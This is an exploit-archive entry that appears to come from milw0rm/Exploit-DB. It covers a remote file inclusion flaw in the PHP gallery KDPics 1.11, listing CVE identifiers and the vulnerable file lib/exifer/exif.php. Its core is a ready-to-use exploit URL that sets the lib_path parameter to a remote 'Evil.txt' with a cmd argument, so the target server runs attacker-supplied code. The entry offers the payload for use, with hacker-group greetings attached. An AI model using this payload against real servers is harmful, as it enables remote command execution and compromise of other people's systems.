EXPLOITS

KDPics 1.11 - 'exif.php?lib_path' Remote File Inclusion

Author: AsTrex
type: webapps
platform: php
port: 
date_added: 2007-02-02  
date_updated:   
verified: 1  
codes: OSVDB-31870;CVE-2006-6517;OSVDB-31869;OSVDB-31868;CVE-2006-6516  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 3263.txt  

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
KDPics <=  Remote File Include Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Discovered by AsTrex    "Rif Hackers  Team"
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
URL:
http://www.phpscripts-fr.net/scripts/download.php?id=2212
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
V.CODE: In :KDPics/lib/exifer/exif.php
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit:
http://www.victime.com/[KDPics_path]/lib/exifer/exif.php?lib_path?=Evil.txt?cmd
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greeetz to : moroccan islam defenders ,ba azdin , xskull , savi7

# milw0rm.com [2007-02-03]